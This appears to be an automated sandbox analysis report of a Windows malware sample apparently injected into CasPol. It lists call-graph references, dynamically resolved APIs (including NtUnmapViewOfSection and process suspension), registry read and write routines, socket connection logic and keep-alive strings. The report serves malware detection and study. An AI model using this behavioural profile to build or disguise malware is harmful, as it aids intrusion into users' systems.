46866 41a4e8 StrToIntA 46865->46866 46867 41a4ff 46866->46867 46868 41a4f6 46866->46868 46870 401eea 26 API calls 46867->46870 47221 41c112 28 API calls 46868->47221 46870->46863 46872 40698f 46871->46872 46873 4124b7 3 API calls 46872->46873 46874 406996 46873->46874 46874->46492 46874->46493 46876 41ae2c 46875->46876 47222 40b027 46876->47222 46878 41ae34 46878->46507 46880 401e27 46879->46880 46882 401e33 46880->46882 47231 402121 26 API calls 46880->47231 46882->46510 46884 402121 46883->46884 46885 402150 46884->46885 47232 402718 26 API calls _Deallocate 46884->47232 46885->46513 46888 4128c0 46887->46888 46889 406052 28 API calls 46888->46889 46890 4128d5 46889->46890 46891 401fbd 28 API calls 46890->46891 46892 4128e5 46891->46892 46893 4126d2 29 API calls 46892->46893 46894 4128ef 46893->46894 46895 401eea 26 API calls 46894->46895 46896 4128fc 46895->46896 46896->46559 46898 401f6e 46897->46898 47233 402301 46898->47233 46902 412722 46901->46902 46904 4126eb 46901->46904 46903 401eea 26 API calls 46902->46903 46905 40dd3b 46903->46905 46906 4126fd RegSetValueExA RegCloseKey 46904->46906 46905->46560 46906->46902 46908 43a610 _strftime 46907->46908 47237 43994e 46908->47237 46912 41a747 46911->46912 46913 41a6ac GetLocalTime 46911->46913 46914 401eea 26 API calls 46912->46914 46915 404cbf 28 API calls 46913->46915 46916 41a74f 46914->46916 46917 41a6ee 46915->46917 46918 401eea 26 API calls 46916->46918 46919 405ce6 28 API calls 46917->46919 46921 40ddaa 46918->46921 46920 41a6fa 46919->46920 47271 4027cb 46920->47271 46921->46584 46923 41a706 46924 405ce6 28 API calls 46923->46924 46925 41a712 46924->46925 47274 406478 76 API calls 46925->47274 46927 41a720 46928 401eea 26 API calls 46927->46928 46929 41a72c 46928->46929 46930 401eea 26 API calls 46929->46930 46931 41a735 46930->46931 46932 401eea 26 API calls 46931->46932 46933 41a73e 46932->46933 46934 401eea 26 API calls 46933->46934 46934->46912 46936 409536 _wcslen 46935->46936 46937 409541 46936->46937 46938 409558 46936->46938 46939 40c89e 31 API calls 46937->46939 46940 40c89e 31 API calls 46938->46940 46941 409549 46939->46941 46942 409560 46940->46942 46943 401e18 26 API calls 46941->46943 46944 401e18 26 API calls 46942->46944 46959 409553 46943->46959 46945 40956e 46944->46945 46946 401e13 26 API calls 46945->46946 46948 409576 46946->46948 46947 401e13 26 API calls 46949 4095ad 46947->46949 47294 40856b 28 API calls 46948->47294 47279 409837 46949->47279 46952 409588 47295 4028cf 46952->47295 46955 409593 46956 401e18 26 API calls 46955->46956 46957 40959d 46956->46957 46958 401e13 26 API calls 46957->46958 46958->46959 46959->46947 47314 403b40 46960->47314 46964 41a80d 46965 4028cf 28 API calls 46964->46965 46966 41a817 46965->46966 46967 401e13 26 API calls 46966->46967 46968 41a820 46967->46968 46969 401e13 26 API calls 46968->46969 46970 40dfc3 46969->46970 46970->46637 46972 40e08b 46971->46972 46973 41248f RegQueryValueExA RegCloseKey 46971->46973 46972->46665 46972->46669 46973->46972 46975 4125b0 RegQueryValueExW RegCloseKey 46974->46975 46976 4125dd 46974->46976 46975->46976 46977 403b40 28 API calls 46976->46977 46978 40e0ba 46977->46978 46978->46678 46980 412992 RegDeleteValueW 46979->46980 46981 4129a6 46979->46981 46980->46981 46982 4129a2 46980->46982 46981->46687 46982->46687 46984 40cbc5 46983->46984 46985 41246e 3 API calls 46984->46985 46986 40cbcc 46985->46986 46990 40cbeb 46986->46990 47347 401602 46986->47347 46988 40cbd9 47350 4127d5 RegCreateKeyA 46988->47350 46991 413fd4 46990->46991 46992 413feb 46991->46992 47367 41aa83 46992->47367 46994 413ff6 46995 401d64 28 API calls 46994->46995 46996 41400f 46995->46996 46997 43a5f7 _strftime 42 API calls 46996->46997 46998 41401c 46997->46998 46999 414021 Sleep 46998->46999 47000 41402e 46998->47000 46999->47000 47001 401f66 28 API calls 47000->47001 47002 41403d 47001->47002 47003 401d64 28 API calls 47002->47003 47004 41404b 47003->47004 47005 401fbd 28 API calls 47004->47005 47006 414053 47005->47006 47007 41afd3 28 API calls 47006->47007 47008 41405b 47007->47008 47371 404262 WSAStartup 47008->47371 47010 414065 47011 401d64 28 API calls 47010->47011 47012 41406e 47011->47012 47013 401d64 28 API calls 47012->47013 47038 4140ed 47012->47038 47014 414087 47013->47014 47015 401d64 28 API calls 47014->47015 47016 414098 47015->47016 47018 401d64 28 API calls 47016->47018 47017 41afd3 28 API calls 47017->47038 47019 4140a9 47018->47019 47021 401d64 28 API calls 47019->47021 47020 4085b4 28 API calls 47020->47038 47022 4140ba 47021->47022 47024 401d64 28 API calls 47022->47024 47023 4027cb 28 API calls 47023->47038 47026 4140cb 47024->47026 47025 401eef 26 API calls 47025->47038 47027 401d64 28 API calls 47026->47027 47028 4140dd 47027->47028 47473 404101 87 API calls 47028->47473 47030 405ce6 28 API calls 47030->47038 47032 414244 WSAGetLastError 47474 41bc86 30 API calls 47032->47474 47036 401f66 28 API calls 47036->47038 47038->47017 47038->47020 47038->47023 47038->47025 47038->47030 47038->47032 47038->47036 47041 401eea 26 API calls 47038->47041 47042 404cbf 28 API calls 47038->47042 47043 401d8c 26 API calls 47038->47043 47044 401d64 28 API calls 47038->47044 47045 43a5f7 _strftime 42 API calls 47038->47045 47047 41a696 79 API calls 47038->47047 47051 401fbd 28 API calls 47038->47051 47053 412513 31 API calls 47038->47053 47076 41446f 47038->47076 47372 413f9a 47038->47372 47377 4041f1 47038->47377 47384 404915 47038->47384 47399 40428c connect 47038->47399 47459 4047eb WaitForSingleObject 47038->47459 47475 404c9e 28 API calls 47038->47475 47476 413683 50 API calls 47038->47476 47477 4082dc 28 API calls 47038->47477 47478 440c61 26 API calls 47038->47478 47479 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 47038->47479 47041->47038 47042->47038 47043->47038 47044->47038 47046 414b80 Sleep 47045->47046 47046->47038 47047->47038 47051->47038 47053->47038 47054 403b40 28 API calls 47054->47076 47057 41ad56 28 API calls 47057->47076 47058 401d64 28 API calls 47059 4144ed GetTickCount 47058->47059 47482 41ad56 28 API calls 47059->47482 47063 41aed8 28 API calls 47063->47076 47066 405ce6 28 API calls 47066->47076 47067 4027cb 28 API calls 47067->47076 47068 40275c 28 API calls 47068->47076 47070 401eea 26 API calls 47070->47076 47073 401f66 28 API calls 47073->47076 47074 41a696 79 API calls 47074->47076 47075 414b22 CreateThread 47075->47076 47514 419e99 101 API calls 47075->47514 47076->47038 47076->47054 47076->47057 47076->47058 47076->47063 47076->47066 47076->47067 47076->47068 47076->47070 47076->47073 47076->47074 47076->47075 47077 401e13 26 API calls 47076->47077 47480 40cbf1 6 API calls 47076->47480 47481 41adfe 28 API calls 47076->47481 47483 41acb0 GetTickCount 47076->47483 47484 41ac62 30 API calls ___scrt_fastfail 47076->47484 47485 40e679 29 API calls 47076->47485 47486 4027ec 28 API calls 47076->47486 47487 404468 59 API calls ctype 47076->47487 47488 4045d5 111 API calls _Yarn 47076->47488 47489 40a767 84 API calls 47076->47489 47077->47076 47078->46437 47079->46447 47082 4085c0 47081->47082 47083 402e78 28 API calls 47082->47083 47084 4085e4 47083->47084 47084->46469 47086 4124e1 RegQueryValueExA RegCloseKey 47085->47086 47087 41250b 47085->47087 47086->47087 47087->46465 47088->46473 47089->46500 47090->46493 47091->46484 47092->46498 47094 40c8ba 47093->47094 47095 40c8da 47094->47095 47096 40c90f 47094->47096 47099 40c8d0 47094->47099 47515 41a75b 29 API calls 47095->47515 47098 41b16b GetCurrentProcess 47096->47098 47097 40ca03 GetLongPathNameW 47101 403b40 28 API calls 47097->47101 47102 40c914 47098->47102 47099->47097 47104 40ca18 47101->47104 47105 40c918 47102->47105 47106 40c96a 47102->47106 47103 40c8e3 47107 401e18 26 API calls 47103->47107 47108 403b40 28 API calls 47104->47108 47110 403b40 28 API calls 47105->47110 47109 403b40 28 API calls 47106->47109 47111 40c8ed 47107->47111 47112 40ca27 47108->47112 47113 40c978 47109->47113 47114 40c926 47110->47114 47116 401e13 26 API calls 47111->47116 47518 40cc37 28 API calls 47112->47518 47119 403b40 28 API calls 47113->47119 47120 403b40 28 API calls 47114->47120 47116->47099 47117 40ca3a 47519 402860 28 API calls 47117->47519 47122 40c98e 47119->47122 47123 40c93c 47120->47123 47121 40ca45 47520 402860 28 API calls 47121->47520 47517 402860 28 API calls 47122->47517 47516 402860 28 API calls 47123->47516 47127 40ca4f 47130 401e13 26 API calls 47127->47130 47128 40c999 47131 401e18 26 API calls 47128->47131 47129 40c947 47132 401e18 26 API calls 47129->47132 47134 40ca59 47130->47134 47135 40c9a4 47131->47135 47133 40c952 47132->47133 47137 401e13 26 API calls 47133->47137 47138 401e13 26 API calls 47134->47138 47136 401e13 26 API calls 47135->47136 47139 40c9ad 47136->47139 47140 40c95b 47137->47140 47141 40ca62 47138->47141 47143 401e13 26 API calls 47139->47143 47144 401e13 26 API calls 47140->47144 47142 401e13 26 API calls 47141->47142 47145 40ca6b 47142->47145 47143->47111 47144->47111 47146 401e13 26 API calls 47145->47146 47147 40ca74 47146->47147 47148 401e13 26 API calls 47147->47148 47149 40ca7d 47148->47149 47149->46546 47150->46557 47151->46580 47152->46539 47153->46572 47154->46608 47155->46618 47156->46641 47157->46630 47158->46664 47160 401e0c 47159->47160 47161->46491 47164 40e183 47163->47164 47165 41a66c LoadResource LockResource SizeofResource 47163->47165 47164->46780 47165->47164 47167 401f8e 47166->47167 47173 402325 47167->47173 47169 401fa4 47169->46784 47171 401f86 28 API calls 47170->47171 47172 406066 47171->47172 47172->46791 47174 40232f 47173->47174 47176 40233a 47174->47176 47177 40294a 28 API calls 47174->47177 47176->47169 47177->47176 47179 40250d 47178->47179 47181 40252b 47179->47181 47182 40261a 28 API calls 47179->47182 47181->46795 47182->47181 47183->46816 47184->46816 47185->46805 47186->46797 47187->46820 47188->46824 47189->46826 47193 402e85 47191->47193 47192 402ea9 47192->46835 47193->47192 47194 402e98 47193->47194 47195 402eae 47193->47195 47198 403445 28 API calls 47194->47198 47195->47192 47199 40225b 26 API calls 47195->47199 47198->47192 47199->47192 47201 404bd0 47200->47201 47204 40245c 47201->47204 47203 404be4 47203->46838 47205 402469 47204->47205 47207 402478 47205->47207 47208 402ad3 28 API calls 47205->47208 47207->47203 47208->47207 47209->46842 47210->46845 47212 401e94 47211->47212 47214 41a481 47213->47214 47215 41b178 GetCurrentProcess 47213->47215 47216 412513 RegOpenKeyExA 47214->47216 47215->47214 47217 412541 RegQueryValueExA RegCloseKey 47216->47217 47218 412569 47216->47218 47217->47218 47219 401f66 28 API calls 47218->47219 47220 41257e 47219->47220 47220->46859 47221->46867 47223 40b02f 47222->47223 47226 40b04b 47223->47226 47225 40b045 47225->46878 47227 40b055 47226->47227 47229 40b060 47227->47229 47230 40b138 28 API calls 47227->47230 47229->47225 47230->47229 47231->46882 47232->46885 47234 40230d 47233->47234 47235 402325 28 API calls 47234->47235 47236 401f80 47235->47236 47236->46551 47255 43a555 47237->47255 47239 43999b 47264 4392ee 38 API calls 3 library calls 47239->47264 47240 439960 47240->47239 47241 439975 47240->47241 47254 40dd54 47240->47254 47262 445364 20 API calls __dosmaperr 47241->47262 47244 43997a 47263 43a837 26 API calls _Deallocate 47244->47263 47247 4399a7 47248 4399d6 47247->47248 47265 43a59a 42 API calls __Tolower 47247->47265 47251 439a42 47248->47251 47266 43a501 26 API calls 2 library calls 47248->47266 47267 43a501 26 API calls 2 library calls 47251->47267 47252 439b09 _strftime 47252->47254 47268 445364 20 API calls __dosmaperr 47252->47268 47254->46567 47254->46568 47256 43a55a 47255->47256 47257 43a56d 47255->47257 47269 445364 20 API calls __dosmaperr 47256->47269 47257->47240 47259 43a55f 47270 43a837 26 API calls _Deallocate 47259->47270 47261 43a56a 47261->47240 47262->47244 47263->47254 47264->47247 47265->47247 47266->47251 47267->47252 47268->47254 47269->47259 47270->47261 47275 401e9b 47271->47275 47273 4027d9 47273->46923 47274->46927 47276 401ea7 47275->47276 47277 40245c 28 API calls 47276->47277 47278 401eb9 47277->47278 47278->47273 47280 409855 47279->47280 47281 4124b7 3 API calls 47280->47281 47282 40985c 47281->47282 47283 409870 47282->47283 47284 40988a 47282->47284 47286 4095cf 47283->47286 47287 409875 47283->47287 47300 4082dc 28 API calls 47284->47300 47286->46603 47298 4082dc 28 API calls 47287->47298 47288 409898 47301 4098a5 85 API calls 47288->47301 47291 409883 47299 409959 29 API calls 47291->47299 47293 409888 47293->47286 47294->46952 47305 402d8b 47295->47305 47297 4028dd 47297->46955 47298->47291 47299->47293 47302 40999f 129 API calls 47299->47302 47300->47288 47301->47286 47303 4099b5 52 API calls 47301->47303 47304 4099a9 124 API calls 47301->47304 47306 402d97 47305->47306 47309 4030f7 47306->47309 47308 402dab 47308->47297 47310 403101 47309->47310 47312 403115 47310->47312 47313 4036c2 28 API calls 47310->47313 47312->47308 47313->47312 47315 403b48 47314->47315 47321 403b7a 47315->47321 47318 403cbb 47330 403dc2 47318->47330 47320 403cc9 47320->46964 47322 403b86 47321->47322 47325 403b9e 47322->47325 47324 403b5a 47324->47318 47326 403ba8 47325->47326 47328 403bb3 47326->47328 47329 403cfd 28 API calls 47326->47329 47328->47324 47329->47328 47331 403dce 47330->47331 47334 402ffd 47331->47334 47333 403de3 47333->47320 47335 40300e 47334->47335 47340 4032a4 47335->47340 47339 40302e 47339->47333 47341 4032b0 47340->47341 47342 40301a 47340->47342 47346 4032b6 28 API calls 47341->47346 47342->47339 47345 4035e8 28 API calls 47342->47345 47345->47339 47353 4395ca 47347->47353 47351 412814 47350->47351 47352 4127ed RegSetValueExA RegCloseKey 47350->47352 47351->46990 47352->47351 47356 43954b 47353->47356 47355 401608 47355->46988 47357 43955a 47356->47357 47358 43956e 47356->47358 47364 445364 20 API calls __dosmaperr 47357->47364 47363 43956a __alldvrm 47358->47363 47366 447611 11 API calls 2 library calls 47358->47366 47360 43955f 47365 43a837 26 API calls _Deallocate 47360->47365 47363->47355 47364->47360 47365->47363 47366->47363 47368 41aac9 ctype ___scrt_fastfail 47367->47368 47369 401f66 28 API calls 47368->47369 47370 41ab3e 47369->47370 47370->46994 47371->47010 47373 413fb3 getaddrinfo WSASetLastError 47372->47373 47374 413fa9 47372->47374 47373->47038 47490 413e37 35 API calls ___std_exception_copy 47374->47490 47376 413fae 47376->47373 47378 404206 socket 47377->47378 47379 4041fd 47377->47379 47381 404220 47378->47381 47382 404224 CreateEventW 47378->47382 47491 404262 WSAStartup 47379->47491 47381->47038 47382->47038 47383 404202 47383->47378 47383->47381 47385 4049b1 47384->47385 47386 40492a 47384->47386 47385->47038 47387 404933 47386->47387 47388 404987 CreateEventA CreateThread 47386->47388 47389 404942 GetLocalTime 47386->47389 47387->47388 47388->47385 47494 404b1d 47388->47494 47492 41ad56 28 API calls 47389->47492 47391 40495b 47493 404c9e 28 API calls 47391->47493 47393 404968 47394 401f66 28 API calls 47393->47394 47395 404977 47394->47395 47396 41a696 79 API calls 47395->47396 47397 40497c 47396->47397 47398 401eea 26 API calls 47397->47398 47398->47388 47400 4043e1 47399->47400 47401 4042b3 47399->47401 47402 4043e7 WSAGetLastError 47400->47402 47403 404343 47400->47403 47401->47403 47405 4042e8 47401->47405 47406 404cbf 28 API calls 47401->47406 47402->47403 47404 4043f7 47402->47404 47403->47038 47407 4042f7 47404->47407 47408 4043fc 47404->47408 47498 420161 27 API calls 47405->47498 47410 4042d4 47406->47410 47416 401f66 28 API calls 47407->47416 47509 41bc86 30 API calls 47408->47509 47413 401f66 28 API calls 47410->47413 47412 4042f0 47412->47407 47415 404306 47412->47415 47418 4042e3 47413->47418 47414 40440b 47510 404c9e 28 API calls 47414->47510 47425 404315 47415->47425 47426 40434c 47415->47426 47417 404448 47416->47417 47420 401f66 28 API calls 47417->47420 47421 41a696 79 API calls 47418->47421 47423 404457 47420->47423 47421->47405 47422 404418 47424 401f66 28 API calls 47422->47424 47427 41a696 79 API calls 47423->47427 47428 404427 47424->47428 47430 401f66 28 API calls 47425->47430 47506 420f44 55 API calls 47426->47506 47427->47403 47431 41a696 79 API calls 47428->47431 47433 404324 47430->47433 47435 40442c 47431->47435 47432 404354 47436 404389 47432->47436 47437 404359 47432->47437 47434 401f66 28 API calls 47433->47434 47438 404333 47434->47438 47440 401eea 26 API calls 47435->47440 47508 4202fa 28 API calls 47436->47508 47441 401f66 28 API calls 47437->47441 47442 41a696 79 API calls 47438->47442 47440->47403 47444 404368 47441->47444 47456 404338 47442->47456 47443 404391 47445 4043be CreateEventW CreateEventW 47443->47445 47447 401f66 28 API calls 47443->47447 47446 401f66 28 API calls 47444->47446 47445->47403 47448 404377 47446->47448 47450 4043a7 47447->47450 47451 41a696 79 API calls 47448->47451 47453 401f66 28 API calls 47450->47453 47452 40437c 47451->47452 47507 4205a2 53 API calls 47452->47507 47455 4043b6 47453->47455 47457 41a696 79 API calls 47455->47457 47499 4201a1 47456->47499 47458 4043bb 47457->47458 47458->47445 47460 404805 SetEvent CloseHandle 47459->47460 47461 40481c closesocket 47459->47461 47462 40489c 47460->47462 47463 404829 47461->47463 47462->47038 47464 404838 47463->47464 47465 40483f 47463->47465 47513 404ab1 83 API calls 47464->47513 47467 404851 WaitForSingleObject 47465->47467 47468 404892 SetEvent CloseHandle 47465->47468 47469 4201a1 3 API calls 47467->47469 47468->47462 47470 404860 SetEvent WaitForSingleObject 47469->47470 47471 4201a1 3 API calls 47470->47471 47472 404878 SetEvent CloseHandle CloseHandle 47471->47472 47472->47468 47473->47038 47474->47038 47475->47038 47476->47038 47477->47038 47478->47038 47479->47038 47480->47076 47481->47076 47482->47076 47483->47076 47484->47076 47485->47076 47486->47076 47487->47076 47488->47076 47489->47076 47490->47376 47491->47383 47492->47391 47493->47393 47497 404b29 101 API calls 47494->47497 47496 404b26 47497->47496 47498->47412 47500 41dc25 47499->47500 47501 4201a9 47499->47501 47502 41dc33 47500->47502 47511 41cd79 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47500->47511 47501->47403 47512 41d960 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47502->47512 47505 41dc3a 47506->47432 47507->47456 47508->47443 47509->47414 47510->47422 47511->47502 47512->47505 47513->47465 47515->47103 47516->47129 47517->47128 47518->47117 47519->47121 47520->47127 47522 40e56a 47521->47522 47523 4124b7 3 API calls 47522->47523 47524 40e60e 47522->47524 47526 40e5fe Sleep 47522->47526 47543 40e59c 47522->47543 47523->47522 47557 4082dc 28 API calls 47524->47557 47526->47522 47529 41ae18 28 API calls 47529->47543 47530 40e619 47531 41ae18 28 API calls 47530->47531 47532 40e625 47531->47532 47558 412774 29 API calls 47532->47558 47535 401e13 26 API calls 47535->47543 47536 40e638 47537 401e13 26 API calls 47536->47537 47539 40e644 47537->47539 47538 401f66 28 API calls 47538->47543 47540 401f66 28 API calls 47539->47540 47541 40e655 47540->47541 47544 4126d2 29 API calls 47541->47544 47542 4126d2 29 API calls 47542->47543 47543->47526 47543->47529 47543->47535 47543->47538 47543->47542 47554 40bf04 73 API calls ___scrt_fastfail 47543->47554 47555 4082dc 28 API calls 47543->47555 47556 412774 29 API calls 47543->47556 47545 40e668 47544->47545 47559 411699 TerminateProcess WaitForSingleObject 47545->47559 47547 40e670 ExitProcess 47560 411637 60 API calls 47550->47560 47555->47543 47556->47543 47557->47530 47558->47536 47559->47547

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                                                                                                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                                                                                                            • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                                                                                                            • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                                                                                                            • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                            • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                                                                                                            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                                                                                                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                                                                                                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                            • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE29
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
                                                                                                            • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE73
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                            • API String ID: 384173800-625181639
                                                                                                            • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                            • Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
                                                                                                            • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                            • Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                                            • Sleep.KERNELBASE(00000BB8), ref: 0040E603
                                                                                                            • ExitProcess.KERNEL32 ref: 0040E672
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                                            • String ID: 5.3.0 Pro$override$pth_unenc$BG
                                                                                                            • API String ID: 2281282204-3981147832
                                                                                                            • Opcode ID: 099a9bf13a86a18ae7ced4af45115ec220a16a2a1b66786f925988895ab02a01
                                                                                                            • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                                                                                                            • Opcode Fuzzy Hash: 099a9bf13a86a18ae7ced4af45115ec220a16a2a1b66786f925988895ab02a01
                                                                                                            • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1179 404915-404924 1180 4049b1 1179->1180 1181 40492a-404931 1179->1181 1184 4049b3-4049b7 1180->1184 1182 404933-404937 1181->1182 1183 404939-404940 1181->1183 1185 404987-4049af CreateEventA CreateThread 1182->1185 1183->1185 1186 404942-404982 GetLocalTime call 41ad56 call 404c9e call 401f66 call 41a696 call 401eea 1183->1186 1185->1184 1186->1185
                                                                                                            APIs
                                                                                                            • GetLocalTime.KERNEL32(?), ref: 00404946
                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7
                                                                                                            Strings
                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Create$EventLocalThreadTime
                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                            • API String ID: 2532271599-1507639952
                                                                                                            • Opcode ID: d248886e52a7d0ac6cae50da1f59772ac17be00107f66e41d9b0c0522851940d
                                                                                                            • Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
                                                                                                            • Opcode Fuzzy Hash: d248886e52a7d0ac6cae50da1f59772ac17be00107f66e41d9b0c0522851940d
                                                                                                            • Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
                                                                                                            APIs
                                                                                                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                                                                                                            • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                                                                                                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000B.00000002.4533020181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_11_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 1815803762-0
                                                                                                            • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                            • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                                                                                                            • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
